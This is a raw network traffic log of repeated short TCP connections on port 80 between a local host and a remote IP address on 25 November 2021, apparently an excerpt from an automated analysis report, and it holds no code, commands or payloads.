                                              Nov 25, 2021 10:48:54.398863077 CET4992380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:54.400388002 CET4992380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:54.433700085 CET8049923176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:54.433872938 CET4992380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:54.467231035 CET8049923176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:54.490242004 CET8049923176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:54.490298986 CET8049923176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:54.490499020 CET4992380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:54.490617037 CET4992380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:54.523749113 CET8049923176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:54.916212082 CET4992480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:54.949554920 CET8049924176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:54.949774027 CET4992480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:54.951317072 CET4992480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:54.984435081 CET8049924176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:54.984689951 CET4992480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:55.017911911 CET8049924176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:55.038609028 CET8049924176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:55.038682938 CET8049924176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:55.038801908 CET4992480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:55.038857937 CET4992480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:55.072074890 CET8049924176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:55.449352026 CET4992580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:55.482752085 CET8049925176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:55.482976913 CET4992580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:55.484488964 CET4992580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:55.517874002 CET8049925176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:55.518080950 CET4992580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:55.551451921 CET8049925176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:55.568913937 CET8049925176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:55.568964958 CET8049925176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:55.569144011 CET4992580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:55.569195032 CET4992580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:55.602686882 CET8049925176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:55.972367048 CET4992680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:56.005785942 CET8049926176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:56.006212950 CET4992680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:56.007947922 CET4992680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:56.041265965 CET8049926176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:56.041470051 CET4992680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:56.074898958 CET8049926176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:56.094065905 CET8049926176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:56.094114065 CET8049926176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:56.094253063 CET4992680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:56.094300985 CET4992680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:56.127866030 CET8049926176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:56.471900940 CET4992780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:56.505968094 CET8049927176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:56.506220102 CET4992780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:56.507759094 CET4992780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:56.541707993 CET8049927176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:56.541923046 CET4992780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:56.576040983 CET8049927176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:56.596268892 CET8049927176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:56.596333981 CET8049927176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:56.596486092 CET4992780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:56.596553087 CET4992780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:56.630856991 CET8049927176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:57.004852057 CET4992880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:57.038917065 CET8049928176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:57.039277077 CET4992880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:57.040796995 CET4992880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:57.074779034 CET8049928176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:57.074956894 CET4992880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:57.109112024 CET8049928176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:57.126076937 CET8049928176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:57.126132011 CET8049928176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:57.126313925 CET4992880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:57.126396894 CET4992880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:57.160732031 CET8049928176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:57.509054899 CET4992980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:57.542102098 CET8049929176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:57.542284966 CET4992980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:57.544069052 CET4992980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:57.577233076 CET8049929176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:57.577482939 CET4992980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:57.610781908 CET8049929176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:57.626811028 CET8049929176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:57.626867056 CET8049929176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:57.627293110 CET4992980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:57.627352953 CET4992980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:57.660703897 CET8049929176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:58.046160936 CET4993080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:58.080046892 CET8049930176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:58.080249071 CET4993080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:58.081847906 CET4993080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:58.115648985 CET8049930176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:58.116245031 CET4993080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:58.150079012 CET8049930176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:58.168596029 CET8049930176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:58.168658972 CET8049930176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:58.168869972 CET4993080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:58.168922901 CET4993080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:58.202860117 CET8049930176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:58.569021940 CET4993180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:58.603080034 CET8049931176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:58.603313923 CET4993180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:58.604841948 CET4993180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:58.638967037 CET8049931176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:58.639270067 CET4993180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:58.673549891 CET8049931176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:58.692387104 CET8049931176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:58.692451000 CET8049931176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:58.692611933 CET4993180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:58.692672014 CET4993180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:58.726773977 CET8049931176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:59.150527954 CET4993280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:59.184041023 CET8049932176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:59.184319019 CET4993280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:59.185833931 CET4993280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:59.219314098 CET8049932176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:59.219633102 CET4993280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:59.253278017 CET8049932176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:59.272428989 CET8049932176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:59.272494078 CET8049932176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:59.272654057 CET4993280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:59.272722006 CET4993280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:59.306438923 CET8049932176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:59.718640089 CET4993380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:59.752693892 CET8049933176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:59.752938986 CET4993380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:59.754446983 CET4993380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:59.788399935 CET8049933176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:59.788669109 CET4993380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:59.822638988 CET8049933176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:59.838318110 CET8049933176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:59.838376999 CET8049933176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:59.838653088 CET4993380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:59.838737011 CET4993380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:59.872909069 CET8049933176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:00.290584087 CET4993480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:00.324208975 CET8049934176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:00.324433088 CET4993480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:00.325952053 CET4993480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:00.359329939 CET8049934176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:00.359715939 CET4993480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:00.393179893 CET8049934176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:00.411487103 CET8049934176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:00.411535025 CET8049934176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:00.411761045 CET4993480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:00.411803007 CET4993480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:00.445266008 CET8049934176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:00.849597931 CET4993580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:00.883719921 CET8049935176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:00.884015083 CET4993580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:00.885502100 CET4993580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:00.919487000 CET8049935176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:00.919723988 CET4993580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:00.953845978 CET8049935176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:00.972506046 CET8049935176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:00.972534895 CET8049935176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:00.972671032 CET4993580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:00.972717047 CET4993580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:01.006490946 CET8049935176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:01.306140900 CET4993680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:01.339572906 CET8049936176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:01.339910984 CET4993680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:01.341392994 CET4993680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:01.374732018 CET8049936176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:01.374974012 CET4993680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:01.408401012 CET8049936176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:01.424958944 CET8049936176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:01.425010920 CET8049936176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:01.425226927 CET4993680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:01.425287008 CET4993680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:01.458673000 CET8049936176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:01.880484104 CET4993780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:01.914586067 CET8049937176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:01.914796114 CET4993780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:01.916305065 CET4993780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:01.950280905 CET8049937176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:01.950459003 CET4993780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:01.984620094 CET8049937176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:02.000180006 CET8049937176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:02.000236988 CET8049937176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:02.000382900 CET4993780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:02.000438929 CET4993780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:02.034571886 CET8049937176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:02.434910059 CET4993880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:02.468400002 CET8049938176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:02.468611002 CET4993880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:02.470139980 CET4993880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:02.503632069 CET8049938176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:02.503863096 CET4993880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:02.537415028 CET8049938176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:02.553404093 CET8049938176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:02.553469896 CET8049938176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:02.553762913 CET4993880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:02.553862095 CET4993880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:02.587508917 CET8049938176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:02.966933966 CET4993980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:03.001068115 CET8049939176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:03.001220942 CET4993980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:03.002783060 CET4993980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:03.036880016 CET8049939176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:03.037201881 CET4993980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:03.071492910 CET8049939176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:03.092166901 CET8049939176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:03.092222929 CET8049939176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:03.092502117 CET4993980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:03.092585087 CET4993980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:03.126909018 CET8049939176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:03.454917908 CET4994080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:03.488038063 CET8049940176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:03.488271952 CET4994080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:03.489950895 CET4994080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:03.523112059 CET8049940176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:03.523461103 CET4994080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:03.556746006 CET8049940176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:03.577493906 CET8049940176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:03.577565908 CET8049940176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:03.577739000 CET4994080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:03.577799082 CET4994080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:03.611124039 CET8049940176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:03.937809944 CET4994180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:03.971937895 CET8049941176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:03.972163916 CET4994180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:03.973710060 CET4994180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:04.007702112 CET8049941176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:04.007999897 CET4994180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:04.042139053 CET8049941176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:04.058206081 CET8049941176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:04.058260918 CET8049941176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:04.058536053 CET4994180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:04.058619022 CET4994180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:04.092833042 CET8049941176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:04.433562040 CET4994280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:04.467669010 CET8049942176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:04.467819929 CET4994280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:04.469326019 CET4994280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:04.503364086 CET8049942176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:04.503623009 CET4994280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:04.537724018 CET8049942176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:04.553472996 CET8049942176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:04.553544044 CET8049942176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:04.553817034 CET4994280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:04.553899050 CET4994280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:04.588001966 CET8049942176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:04.971168041 CET4994380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:05.004661083 CET8049943176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:05.004882097 CET4994380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:05.006356955 CET4994380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:05.039696932 CET8049943176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:05.039913893 CET4994380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:05.073405981 CET8049943176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:05.094136000 CET8049943176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:05.094199896 CET8049943176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:05.094351053 CET4994380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:05.094414949 CET4994380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:05.127970934 CET8049943176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:05.491472006 CET4994480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:05.524903059 CET8049944176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:05.525127888 CET4994480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:05.526807070 CET4994480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:05.560157061 CET8049944176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:05.560389996 CET4994480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:05.593739986 CET8049944176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:05.609328032 CET8049944176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:05.609383106 CET8049944176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:05.609656096 CET4994480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:05.609739065 CET4994480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:05.643343925 CET8049944176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:05.993745089 CET4994880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:06.027950048 CET8049948176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:06.028233051 CET4994880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:06.029714108 CET4994880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:06.063637018 CET8049948176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:06.063983917 CET4994880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:06.097897053 CET8049948176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:06.113828897 CET8049948176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:06.113838911 CET8049948176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:06.114068031 CET4994880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:06.114074945 CET4994880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:06.147819042 CET8049948176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:06.474020958 CET4994980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:06.507477999 CET8049949176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:06.507642984 CET4994980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:06.509232044 CET4994980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:06.542547941 CET8049949176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:06.542787075 CET4994980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:06.576183081 CET8049949176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:06.599896908 CET8049949176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:06.600163937 CET4994980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:06.600514889 CET8049949176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:06.600682974 CET4994980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:06.633481979 CET8049949176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:06.993573904 CET4995080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:07.026964903 CET8049950176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:07.027174950 CET4995080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:07.028729916 CET4995080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:07.062154055 CET8049950176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:07.062469006 CET4995080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:07.096118927 CET8049950176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:07.112368107 CET8049950176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:07.112432003 CET8049950176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:07.112617016 CET4995080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:07.112709999 CET4995080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:07.146374941 CET8049950176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:07.514194012 CET4995180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:07.548338890 CET8049951176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:07.548475981 CET4995180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:07.550026894 CET4995180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:07.584136009 CET8049951176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:07.584471941 CET4995180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:07.618635893 CET8049951176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:07.634911060 CET8049951176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:07.634963036 CET8049951176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:07.635145903 CET4995180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:07.635200024 CET4995180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:07.669365883 CET8049951176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:08.011497021 CET4995280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:08.044923067 CET8049952176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:08.045149088 CET4995280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:08.046701908 CET4995280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:08.079946041 CET8049952176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:08.080122948 CET4995280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:08.113564968 CET8049952176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:08.133228064 CET8049952176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:08.133291960 CET8049952176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:08.133579016 CET4995280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:08.133677006 CET4995280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:08.167256117 CET8049952176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:08.466594934 CET4995380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:08.500710964 CET8049953176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:08.500977039 CET4995380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:08.502494097 CET4995380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:08.536473989 CET8049953176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:08.536693096 CET4995380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:08.571477890 CET8049953176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:08.595326900 CET8049953176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:08.595382929 CET8049953176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:08.595560074 CET4995380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:08.595643044 CET4995380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:08.629909039 CET8049953176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:09.017771006 CET4995480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:09.051691055 CET8049954176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:09.051914930 CET4995480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:09.053477049 CET4995480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:09.087382078 CET8049954176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:09.087551117 CET4995480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:09.121385098 CET8049954176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:09.137372971 CET8049954176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:09.137401104 CET8049954176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:09.137571096 CET4995480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:09.137603998 CET4995480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:09.171593904 CET8049954176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:49:09.548882961 CET4995580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:49:09.582165956 CET8049955176.223.209.128192.168.11.20
